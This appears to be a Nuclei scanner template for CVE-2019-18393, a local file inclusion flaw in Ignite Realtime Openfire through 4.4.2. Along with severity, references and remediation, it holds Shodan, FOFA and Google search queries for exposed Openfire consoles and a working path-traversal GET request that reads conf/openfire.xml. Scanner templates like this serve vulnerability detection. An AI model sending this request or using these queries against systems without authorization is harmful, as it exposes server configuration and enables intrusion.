id: CVE-2019-18393 info: name: Ignite Realtime Openfire <4.42 - Local File Inclusion author: pikpikcu severity: medium description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system. remediation: | Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability. reference: - https://github.com/igniterealtime/Openfire/pull/1498 - https://swarm.ptsecurity.com/openfire-admin-console/ - https://nvd.nist.gov/vuln/detail/CVE-2019-18393 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 epss-percentile: 0.52637 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: igniterealtime product: openfire shodan-query: - http.title:"openfire admin console" - http.title:"openfire" fofa-query: - title="openfire" - title="openfire admin console" google-query: - intitle:"openfire" - intitle:"openfire admin console" tags: cve,cve2019,openfire,lfi,igniterealtime http: - method: GET path: - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml' matchers-condition: and matchers: - type: word part: body words: - "org.jivesoftware.database.EmbeddedConnectionProvider" - "Most properties are stored in the Openfire database" - type: status status: - 200 # digest: 4a0a00473045022100c2e8314d8936ecc1f47c71f1544e8daefada4c4eeafabab1b8f2c85701ca93fe02203d3c24d07b8b1d7349e14b242f127ddf4c7fa8d748a06daf95e857109fbbf4e3:922c64590222798bb761d5b6d8e72950